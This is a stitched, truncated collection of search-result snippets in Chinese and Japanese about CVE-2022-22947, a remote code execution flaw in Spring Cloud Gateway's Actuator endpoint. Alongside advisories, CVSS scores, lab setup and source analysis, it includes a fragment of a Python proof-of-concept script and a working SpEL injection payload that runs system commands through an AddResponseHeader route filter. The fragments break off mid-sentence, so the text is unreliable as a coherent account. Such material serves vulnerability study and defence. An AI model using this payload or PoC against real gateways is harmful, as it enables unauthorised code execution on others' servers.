Spring Cloud Gateway远程代码执行漏洞(CVE-2022-22947)发生在Spring Cloud Gateway应用程序的Actuator端点,其在启用、公开和不安全的情况下容易受到代码注入的攻击。攻击者可通过该漏洞恶意创建允许在远程主机上执行任意远程执行的请求。 利用条件 3.1.0 3.0.0 to 3.0.6 环境搭建 使用vulhub搭建漏洞环境 切换到/vulhub...
首先进入Vulhub CVE-2022-22947目录,进行如下操作: sudo docker ps --no-trunc# 查看command列java -Djava.security.egd=file:/dev/./urandom -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5005-jar /spring-cloud-gateway-0.0.1-SNAPSHOT.jar# command列为启动容器时默认执行的命令,我们将...
'''b ='python CVE-2022-22947_POC.py url.txt'uri_check='/actuator/gateway/routes/code'uri_refresh='/actuator/gateway/refresh'headers = {'Accept-Encoding':'gzip, deflate','Accept':'*/*','Accept-Language':'en','User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537...
本漏洞复现文章仅用于学习、工作与兴趣爱好,并立志为网络安全奉献一份力量,凡是利用本博客相关内容的无良hackers造成的安全事故均与本人无关!
CVE-2022-22947是一个严重的远程代码执行漏洞,影响广泛使用的Spring Cloud Gateway框架。该漏洞允许攻击者在受影响的系统上执行任意代码,可能导致数据泄露、系统破坏等严重后果。二、漏洞影响 影响范围:CVE-2022-22947漏洞影响所有使用Spring Cloud Gateway框架的版本,包括但不限于Spring Cloud Gateway 2.x系列。 潜在...
CVSS スコアのソース: CVE-2022-22947 CVSS v3 リスクファクター: Critical 基本値: 10 現状値: 9.5 ベクトル: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H 現状ベクトル: CVSS:3.0/E:H/RL:O/RC:C 脆弱性情報 CPE: cpe:/a:vmware:spring_cloud_gateway エクスプロイトが利用...
CVE-2022-22947是一个严重的远程代码执行漏洞,影响广泛,给Spring Cloud Gateway用户带来了严重的安全风险。该漏洞允许攻击者在未授权的情况下执行任意代码,可能导致数据泄露、系统被完全控制等严重后果。复现过程: 攻击者首先需要向目标Spring Cloud Gateway发送一个恶意请求,该请求包含特定的HTTP头和参数。 当目标接收到...
"filters": [{ "name": "AddResponseHeader", "args": {"name": "Result","value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"whoami\"}).getInputStream()))}"} ...
Spring Cloud GateWay CVE-2022-22947 源码分析 Spring Cloud GateWay版本:3.1.0&<=3.0.0-3.0.6 源码:https://github.com/spring-cloud/spring-cloud-gateway/releases/tag/v3.1.0 idea打开就能分析了 在shortcutConfigurable#getValue中,#{}包住的进行spel解析,这就是链最后的地方,控制entryValue即可实现spel注...
近日,华为云关注到VMware官方发布安全公告,披露Spring Cloud Gateway存在一处远程代码执行漏洞(CVE-2022-22947)。当Spring Cloud Gateway启用、暴露 和不安全Gateway Actuator 端点时,攻击者可以通过向使用 Spring Cloud Gateway 的应用程序发送特制的恶意请求,触发远程任意代码执行,利用难度低,目前POC已公开,风险较高。